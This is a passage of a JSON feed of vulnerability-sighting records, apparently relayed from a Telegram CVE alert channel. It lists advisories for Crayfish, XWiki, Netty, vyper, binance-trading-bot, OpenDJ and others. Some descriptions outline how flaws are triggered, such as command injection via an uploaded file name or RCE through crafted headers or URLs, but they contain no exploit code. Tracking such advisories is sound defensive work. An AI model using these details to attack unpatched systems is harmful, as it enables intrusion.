"vulnerability": "GHSA-C2P2-HGJG-9R3F", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/4137", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-c2p2-hgjg-9r3f\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: ### Impact\n_What kind of vulnerability is it? Who is impacted?_\n\nRemote code execution is possible in web-accessible installations of hypercube. \n\n### Patches\n_Has the problem been patched? What versions should users upgrade to?_\n\nNot yet, though no patch is neccessary if your installation of the microservices is behind a firewall.  See below.\n\n### Workarounds\n_Is there a way for users to fix or remediate the vulnerability without upgrading?_\n\nThe exploit requires making a request against Hypercube's endpoints; therefore, the ability to make use of the exploit is much reduced if the microservice is not directly accessible from the Internet, so: Prevent general access from the Internet from hitting Hypercube.  Furthermore, if you've used any of the official installation methods, your Crayfish will be behind a firewall and there is no work neccessary.\n\nThe webserver might be made to validate the structure of headers passed, but that would only be neccessary if you publicly exposed the endpoint. Standard security practices should be applied.\n\n### References\n_Are there any links users can visit to find out more?_\n\n- XBOW-024-074\n\ud83d\udccf Published: 2025-02-12T21:05:47Z\n\ud83d\udccf Modified: 2025-02-12T21:05:47Z\n\ud83d\udd17 References:\n1. https://github.com/Islandora/Crayfish/security/advisories/GHSA-c2p2-hgjg-9r3f\n2. https://github.com/Islandora/Crayfish", "creation_timestamp": "2025-02-12T21:09:44.000000Z"}, {"uuid": "96edc1c0-065b-4f38-9816-9917705eab7e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JPPH-G9P7-9JRM", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/4292", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-24906\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: No description available\n\ud83d\udccf Published: 2025-02-03T22:15:28.963\n\ud83d\udccf Modified: N/A\n\ud83d\udd17 References:\n1. https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-jpph-g9p7-9jrm", "creation_timestamp": "2025-02-13T19:08:57.000000Z"}, {"uuid": "cb0795aa-931a-457d-9cce-4f153ca383de", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-X28G-6228-99P9", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/4293", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-24957\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: No description available\n\ud83d\udccf Published: 2025-02-03T22:15:29.087\n\ud83d\udccf Modified: N/A\n\ud83d\udd17 References:\n1. https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-x28g-6228-99p9", "creation_timestamp": "2025-02-13T19:09:34.000000Z"}, {"uuid": "8f0c3023-116c-4b44-9fc2-2a5a4cc582f8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-R58Q-66G9-H6G8", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/4289", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-24903\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: No description available\n\ud83d\udccf Published: 2025-02-13T16:16:48.913\n\ud83d\udccf Modified: N/A\n\ud83d\udd17 References:\n1. https://github.com/whisperfish/libsignal-service-rs/commit/82d70f6720e762898f34ae76b0894b0297d9b2f8\n2. https://github.com/whisperfish/libsignal-service-rs/security/advisories/GHSA-r58q-66g9-h6g8", "creation_timestamp": "2025-02-13T17:15:16.000000Z"}, {"uuid": "7a371583-e615-4311-959e-48bcd0a7435f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MQ77-3Q68-V64V", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/4287", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-25287\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: No description available\n\ud83d\udccf Published: 2025-02-13T16:16:49.187\n\ud83d\udccf Modified: N/A\n\ud83d\udd17 References:\n1. https://github.com/lakejason0/mediawiki-skins-Lakeus/blob/82ad2cd341f85b814a6a0f37969e6210ebf2521d/includes/SkinLakeus.php#L27\n2. https://github.com/lakejason0/mediawiki-skins-Lakeus/blob/82ad2cd341f85b814a6a0f37969e6210ebf2521d/resources/themeDesigner.js\n3. https://github.com/lakejason0/mediawiki-skins-Lakeus/commit/fb79928f06efa47677fff27e0f4755eb32b1c8d9\n4. https://github.com/lakejason0/mediawiki-skins-Lakeus/security/advisories/GHSA-mq77-3q68-v64v", "creation_timestamp": "2025-02-13T17:14:59.000000Z"}, {"uuid": "2ec02555-b80c-412e-906b-dd5796883590", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-P44G-M5W8-GWHM", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/4621", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-p44g-m5w8-gwhm\n\ud83d\udd25 CVSS Score: 4.2 (CVSS_V3)\n\ud83d\udd39 Description: A vulnerability classified as problematic was found in Pix Software Vivaz 6.0.10. This vulnerability affects unknown code. The manipulation leads to cross-site request forgery. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.\n\ud83d\udccf Published: 2025-02-16T21:31:43Z\n\ud83d\udccf Modified: 2025-02-16T21:31:43Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2025-1358\n2. https://vuldb.com/?ctiid.295966\n3. https://vuldb.com/?id.295966\n4. https://vuldb.com/?submit.496141", "creation_timestamp": "2025-02-17T00:21:07.000000Z"}, {"uuid": "46557f3c-8358-4ebf-ba05-579054d6d9fe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-R275-J57C-7MF2", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/4480", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-47634\n\ud83d\udd25 CVSS Score: 3.0 (CVSS_V3)\n\ud83d\udd39 Description: ### Impact\n\nA race condition in the endorsement of resources (for instance, a proposal) allows a user to make more than once endorsement.\n\nTo exploit this vulnerability, the request to set an endorsement must be sent several times in parallel.\n \n### Workarounds\n\nDisable the Endorsement feature in the components.\n\ud83d\udccf Published: 2024-02-20T18:02:52Z\n\ud83d\udccf Modified: 2025-02-14T18:35:17Z\n\ud83d\udd17 References:\n1. https://github.com/decidim/decidim/security/advisories/GHSA-r275-j57c-7mf2\n2. https://nvd.nist.gov/vuln/detail/CVE-2023-47634\n3. https://github.com/decidim/decidim/commit/5c5ee7a50d75c10643dd8c495e2517641e4d74db\n4. https://github.com/decidim/decidim/commit/7b840d2c37a562709f4481db644d8c43add28536\n5. https://github.com/decidim/decidim\n6. https://github.com/decidim/decidim/releases/tag/v0.26.9\n7. https://github.com/decidim/decidim/releases/tag/v0.27.5\n8. https://github.com/decidim/decidim/releases/tag/v0.28.0\n9. https://github.com/rubysec/ruby-advisory-db/blob/master/gems/decidim/CVE-2023-47634.yml", "creation_timestamp": "2025-02-14T19:16:17.000000Z"}, {"uuid": "b85c598d-2a74-4820-9929-4fbd449aef40", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:3233", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/4528", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-6918\n\ud83d\udd25 CVSS Score: 3.6 (CVSS_V3)\n\ud83d\udd39 Description: A flaw was found in the libssh implements abstract layer for message digest (MD) operations implemented by different supported crypto backends. The return values from these were not properly checked, which could cause low-memory situations failures, NULL dereferences, crashes, or usage of the uninitialized memory as an input for the KDF. In this case, non-matching keys will result in decryption/integrity failures, terminating the connection.\n\ud83d\udccf Published: 2023-12-19T00:30:21Z\n\ud83d\udccf Modified: 2025-02-15T03:31:24Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2023-6918\n2. https://access.redhat.com/errata/RHSA-2024:2504\n3. https://access.redhat.com/errata/RHSA-2024:3233\n4. https://access.redhat.com/security/cve/CVE-2023-6918\n5. https://bugzilla.redhat.com/show_bug.cgi?id=2254997\n6. https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/LZQVUHWVWRH73YBXUQJOD6CKHDQBU3DM\n7. https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MKQRBF3DWMWPH36LBCOBUTSIZRTPEZXB\n8. https://security.netapp.com/advisory/ntap-20250214-0009\n9. https://www.libssh.org/2023/12/18/libssh-0-10-6-and-libssh-0-9-8-security-releases\n10. https://www.libssh.org/security/advisories/CVE-2023-6918.txt", "creation_timestamp": "2025-02-15T04:11:32.000000Z"}, {"uuid": "bdbc5def-acc3-4ab9-b12a-3f29a7e35a1d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-R5VH-GC3R-R24W", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/4923", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-31988\n\ud83d\udd25 CVSS Score: 9.7 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: XWiki Platform is a generic wiki platform. Starting in version 13.9-rc-1 and prior to versions 4.10.19, 15.5.4, and 15.10-rc-1, when the realtime editor is installed in XWiki, it allows arbitrary remote code execution with the interaction of an admin user with programming right. More precisely, by getting an admin user to either visit a crafted URL or to view an image with this URL that could be in a comment, the attacker can get the admin to execute arbitrary XWiki syntax including scripting macros with Groovy or Python code. This compromises the confidentiality, integrity and availability of the whole XWiki installation. This vulnerability has been patched in XWiki 14.10.19, 15.5.4 and 15.9. As a workaround, one may update `RTFrontend.ConvertHTML` manually with the patch. This will, however, break some synchronization processes in the realtime editor, so upgrading should be the preferred way on installations where this editor is used.\n\ud83d\udccf Published: 2024-04-10T20:40:36.954Z\n\ud83d\udccf Modified: 2025-02-21T17:03:40.838Z\n\ud83d\udd17 References:\n1. https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-r5vh-gc3r-r24w\n2. https://github.com/xwiki/xwiki-platform/commit/4896712ee6483da623f131be2e618f1f2b79cb8d\n3. https://github.com/xwiki/xwiki-platform/commit/9f8cc88497418750b09ce9fde5d67d840f038fbf\n4. https://github.com/xwiki/xwiki-platform/commit/d88da4572fb7d4f95e1f54bb0cce33fce3df08d9\n5. https://github.com/xwiki/xwiki-platform/commit/d9f5043da289ff106f08e23576746fd8baf98794\n6. https://jira.xwiki.org/browse/XWIKI-21424", "creation_timestamp": "2025-02-21T17:18:17.000000Z"}, {"uuid": "f728918d-2a1a-471b-b590-9d739362aa72", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:6122", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5259", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-12698\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: An incomplete fix for ose-olm-catalogd-container was issued for the Rapid Reset Vulnerability (CVE-2023-39325/CVE-2023-44487) where only unauthenticated streams were protected, not streams created by authenticated sources.\n\ud83d\udccf Published: 2024-12-18T05:07:21.026Z\n\ud83d\udccf Modified: 2025-02-25T08:07:40.863Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:6122\n2. https://access.redhat.com/security/cve/CVE-2024-12698\n3. https://bugzilla.redhat.com/show_bug.cgi?id=2332674", "creation_timestamp": "2025-02-25T08:25:23.000000Z"}, {"uuid": "d3814ddd-92b5-4164-9601-22bc1a7aed10", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4G8C-WM8X-JFHW", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/4940", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-24970\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: Netty, an asynchronous, event-driven network application framework, has a vulnerability starting in version 4.1.91.Final and prior to version 4.1.118.Final. When a special crafted packet is received via SslHandler it doesn't correctly handle validation of such a packet in all cases which can lead to a native crash. Version 4.1.118.Final contains a patch. As workaround its possible to either disable the usage of the native SSLEngine or change the code manually.\n\ud83d\udccf Published: 2025-02-10T21:57:28.730Z\n\ud83d\udccf Modified: 2025-02-21T18:03:37.212Z\n\ud83d\udd17 References:\n1. https://github.com/netty/netty/security/advisories/GHSA-4g8c-wm8x-jfhw\n2. https://github.com/netty/netty/commit/87f40725155b2f89adfde68c7732f97c153676c4", "creation_timestamp": "2025-02-21T18:18:55.000000Z"}, {"uuid": "8453acc2-1662-46e0-ba2d-691d637114e0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-P44G-M5W8-GWHM", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/4611", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-p44g-m5w8-gwhm\n\ud83d\udd25 CVSS Score: 4.2 (CVSS_V3)\n\ud83d\udd39 Description: A vulnerability classified as problematic was found in Pix Software Vivaz 6.0.10. This vulnerability affects unknown code. The manipulation leads to cross-site request forgery. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.\n\ud83d\udccf Published: 2025-02-16T21:31:43Z\n\ud83d\udccf Modified: 2025-02-16T21:31:43Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2025-1358\n2. https://vuldb.com/?ctiid.295966\n3. https://vuldb.com/?id.295966\n4. https://vuldb.com/?submit.496141", "creation_timestamp": "2025-02-17T00:19:06.000000Z"}, {"uuid": "8f610724-cc87-4bbb-8cf2-622e73753a98", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7G7F-62CF-Q66H", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/4615", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-7g7f-62cf-q66h\n\ud83d\udd25 CVSS Score: 4.2 (CVSS_V3)\n\ud83d\udd39 Description: A vulnerability, which was classified as problematic, has been found in SIAM Industria de Automa\u00e7\u00e3o e Monitoramento SIAM 2.0. This issue affects some unknown processing of the file /qrcode.jsp. The manipulation of the argument url leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.\n\ud83d\udccf Published: 2025-02-16T21:31:43Z\n\ud83d\udccf Modified: 2025-02-16T21:31:43Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2025-1359\n2. https://vuldb.com/?ctiid.295967\n3. https://vuldb.com/?id.295967\n4. https://vuldb.com/?submit.496171", "creation_timestamp": "2025-02-17T00:19:09.000000Z"}, {"uuid": "8d5f8b2b-c0e1-4f91-af32-920dd43bf7d1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H33Q-MHMP-8P67", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/4998", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-27104\n\ud83d\udd25 CVSS Score: 2.3 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: vyper is a Pythonic Smart Contract Language for the EVM. Multiple evaluation of a single expression is possible in the iterator target of a for loop. While the iterator expression cannot produce multiple writes, it can consume side effects produced in the loop body (e.g. read a storage variable updated in the loop body) and thus lead to unexpected program behavior. Specifically, reads in iterators which contain an ifexp (e.g. `for s: uint256 in ([read(), read()] if True else [])`) may interleave reads with writes in the loop body. Vyper for loops allow two kinds of iterator targets, namely the `range()` builtin and an iterable type, like SArray and DArray. During codegen, iterable lists are required to not produce any side-effects (in the following code, `range_scope` forces `iter_list` to be parsed in a constant context, which is checked against `is_constant`). However, this does not prevent the iterator from consuming side effects provided by the body of the loop. For SArrays on the other hand, `iter_list` is instantiated in the body of a `repeat` ir, so it can be evaluated several times. This issue is being addressed and is expected to be available in version 0.4.1. Users are advised to upgrade as soon as the patched release is available. There are no known workarounds for this vulnerability.\n\ud83d\udccf Published: 2025-02-21T21:32:24.621Z\n\ud83d\udccf Modified: 2025-02-21T21:32:24.621Z\n\ud83d\udd17 References:\n1. https://github.com/vyperlang/vyper/security/advisories/GHSA-h33q-mhmp-8p67\n2. https://github.com/vyperlang/vyper/pull/4488", "creation_timestamp": "2025-02-21T22:18:56.000000Z"}, {"uuid": "1ef1f2e3-78be-4dc7-90d0-2f37a87ad81f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:4613", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5260", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-3727\n\ud83d\udd25 CVSS Score: 8.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: A flaw was found in the github.com/containers/image library. This flaw allows attackers to trigger unexpected authenticated registry accesses on behalf of a victim user, causing resource exhaustion, local path traversal, and other attacks.\n\ud83d\udccf Published: 2024-05-09T14:57:21.327Z\n\ud83d\udccf Modified: 2025-02-25T08:07:16.415Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:0045\n2. https://access.redhat.com/errata/RHSA-2024:3718\n3. https://access.redhat.com/errata/RHSA-2024:4159\n4. https://access.redhat.com/errata/RHSA-2024:4613\n5. https://access.redhat.com/errata/RHSA-2024:4850\n6. https://access.redhat.com/errata/RHSA-2024:4960\n7. https://access.redhat.com/errata/RHSA-2024:5258\n8. https://access.redhat.com/errata/RHSA-2024:5951\n9. https://access.redhat.com/errata/RHSA-2024:6054\n10. https://access.redhat.com/errata/RHSA-2024:6122\n11. https://access.redhat.com/errata/RHSA-2024:6708\n12. https://access.redhat.com/errata/RHSA-2024:6818\n13. https://access.redhat.com/errata/RHSA-2024:6824\n14. https://access.redhat.com/errata/RHSA-2024:7164\n15. https://access.redhat.com/errata/RHSA-2024:7174\n16. https://access.redhat.com/errata/RHSA-2024:7182\n17. https://access.redhat.com/errata/RHSA-2024:7187\n18. https://access.redhat.com/errata/RHSA-2024:7922\n19. https://access.redhat.com/errata/RHSA-2024:7941\n20. https://access.redhat.com/errata/RHSA-2024:8260\n21. https://access.redhat.com/errata/RHSA-2024:8425\n22. https://access.redhat.com/errata/RHSA-2024:9097\n23. https://access.redhat.com/errata/RHSA-2024:9098\n24. https://access.redhat.com/errata/RHSA-2024:9102\n25. https://access.redhat.com/errata/RHSA-2024:9960\n26. https://access.redhat.com/security/cve/CVE-2024-3727\n27. https://bugzilla.redhat.com/show_bug.cgi?id=2274767", "creation_timestamp": "2025-02-25T08:25:24.000000Z"}, {"uuid": "71860c4c-7695-4899-b976-f6a3ac300a0c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:4159", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5260", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-3727\n\ud83d\udd25 CVSS Score: 8.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: A flaw was found in the github.com/containers/image library. This flaw allows attackers to trigger unexpected authenticated registry accesses on behalf of a victim user, causing resource exhaustion, local path traversal, and other attacks.\n\ud83d\udccf Published: 2024-05-09T14:57:21.327Z\n\ud83d\udccf Modified: 2025-02-25T08:07:16.415Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:0045\n2. https://access.redhat.com/errata/RHSA-2024:3718\n3. https://access.redhat.com/errata/RHSA-2024:4159\n4. https://access.redhat.com/errata/RHSA-2024:4613\n5. https://access.redhat.com/errata/RHSA-2024:4850\n6. https://access.redhat.com/errata/RHSA-2024:4960\n7. https://access.redhat.com/errata/RHSA-2024:5258\n8. https://access.redhat.com/errata/RHSA-2024:5951\n9. https://access.redhat.com/errata/RHSA-2024:6054\n10. https://access.redhat.com/errata/RHSA-2024:6122\n11. https://access.redhat.com/errata/RHSA-2024:6708\n12. https://access.redhat.com/errata/RHSA-2024:6818\n13. https://access.redhat.com/errata/RHSA-2024:6824\n14. https://access.redhat.com/errata/RHSA-2024:7164\n15. https://access.redhat.com/errata/RHSA-2024:7174\n16. https://access.redhat.com/errata/RHSA-2024:7182\n17. https://access.redhat.com/errata/RHSA-2024:7187\n18. https://access.redhat.com/errata/RHSA-2024:7922\n19. https://access.redhat.com/errata/RHSA-2024:7941\n20. https://access.redhat.com/errata/RHSA-2024:8260\n21. https://access.redhat.com/errata/RHSA-2024:8425\n22. https://access.redhat.com/errata/RHSA-2024:9097\n23. https://access.redhat.com/errata/RHSA-2024:9098\n24. https://access.redhat.com/errata/RHSA-2024:9102\n25. https://access.redhat.com/errata/RHSA-2024:9960\n26. https://access.redhat.com/security/cve/CVE-2024-3727\n27. https://bugzilla.redhat.com/show_bug.cgi?id=2274767", "creation_timestamp": "2025-02-25T08:25:24.000000Z"}, {"uuid": "fb3562cf-0f18-4df3-b4d1-f727e1e2af54", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:0327", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5266", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-52337\n\ud83d\udd25 CVSS Score: 5.5 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N)\n\ud83d\udd39 Description: A log spoofing flaw was found in the Tuned package due to improper sanitization of some API arguments. This flaw allows an attacker to pass a controlled sequence of characters; newlines can be inserted into the log. Instead of the 'evil' the attacker could mimic a valid TuneD log line and trick the administrator. The quotes '' are usually used in TuneD logs citing raw user input, so there will always be the ' character ending the spoofed input, and the administrator can easily overlook this. This logged string is later used in logging and in the output of utilities, for example, `tuned-adm get_instances` or other third-party programs that use Tuned's D-Bus interface for such operations.\n\ud83d\udccf Published: 2024-11-26T15:21:17.538Z\n\ud83d\udccf Modified: 2025-02-25T11:46:21.468Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:10381\n2. https://access.redhat.com/errata/RHSA-2024:10384\n3. https://access.redhat.com/errata/RHSA-2024:11161\n4. https://access.redhat.com/errata/RHSA-2025:0195\n5. https://access.redhat.com/errata/RHSA-2025:0327\n6. https://access.redhat.com/errata/RHSA-2025:0368\n7. https://access.redhat.com/errata/RHSA-2025:0879\n8. https://access.redhat.com/errata/RHSA-2025:0880\n9. https://access.redhat.com/errata/RHSA-2025:0881\n10. https://access.redhat.com/errata/RHSA-2025:1785\n11. https://access.redhat.com/errata/RHSA-2025:1802\n12. https://access.redhat.com/security/cve/CVE-2024-52337\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2324541\n14. https://security.opensuse.org/2024/11/26/tuned-instance-create.html\n15. https://www.openwall.com/lists/oss-security/2024/11/28/1", "creation_timestamp": "2025-02-25T12:24:13.000000Z"}, {"uuid": "ffcb2411-8428-40c7-a94d-cf91901ce5d0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WQ6J-4388-4GG5", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/5043", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-27106\n\ud83d\udd25 CVSS Score: 7.7 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: binance-trading-bot is an automated Binance trading bot with trailing buy/sell strategy. Authenticated users of binance-trading-bot can achieve Remote Code Execution on the host system due to a command injection vulnerability in the `/restore` endpoint. The restore endpoint of binance-trading-bot is vulnerable to command injection via the `/restore` endpoint. The name of the uploaded file is passed to shell.exec without sanitization other than path normalization, resulting in Remote Code Execution. This may allow any authorized user to execute code in the context of the host machine. This issue has been addressed in version 0.0.100 and all users are advised to upgrade. There are no known workarounds for this vulnerability.\n\ud83d\udccf Published: 2025-02-21T21:18:18.284Z\n\ud83d\udccf Modified: 2025-02-22T15:40:06.071Z\n\ud83d\udd17 References:\n1. https://github.com/chrisleekr/binance-trading-bot/security/advisories/GHSA-wq6j-4388-4gg5\n2. https://github.com/chrisleekr/binance-trading-bot/commit/99d464cf8ef858d441189993054ec5f5f86e6213\n3. https://github.com/chrisleekr/binance-trading-bot/blob/dd8e1a91b872a48aec47bbe1280c1c6ea96784d9/app/frontend/webserver/handlers/restore-post.js#L14", "creation_timestamp": "2025-02-22T16:25:15.000000Z"}, {"uuid": "d7626a97-49ee-449d-ae77-3ce6699fb3a2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-93QR-H8PR-4593", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/6558", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-27497\n\ud83d\udd25 CVSS Score: 8.7 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: OpenDJ is an LDAPv3 compliant directory service. OpenDJ prior to 4.9.3 contains a denial-of-service (DoS) vulnerability that causes the server to become unresponsive to all LDAP requests without crashing or restarting. This issue occurs when an alias loop exists in the LDAP database. If an ldapsearch request is executed with alias dereferencing set to \"always\" on this alias entry, the server stops responding to all future requests. Fortunately, the server can be restarted without data corruption. This vulnerability is fixed in 4.9.3.\n\ud83d\udccf Published: 2025-03-05T15:59:01.702Z\n\ud83d\udccf Modified: 2025-03-05T16:16:49.762Z\n\ud83d\udd17 References:\n1. https://github.com/OpenIdentityPlatform/OpenDJ/security/advisories/GHSA-93qr-h8pr-4593\n2. https://github.com/OpenIdentityPlatform/OpenDJ/commit/08aee4724608e4a32baa3c7d7499ec913a275aaf", "creation_timestamp": "2025-03-05T16:32:22.000000Z"}, {"uuid": "9e280b6f-278f-49f8-bd32-853c8d3d4134", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8366-XMGF-334F", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/6557", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-27412\n\ud83d\udd25 CVSS Score: 6.1 (cvssV3_1, Vector: 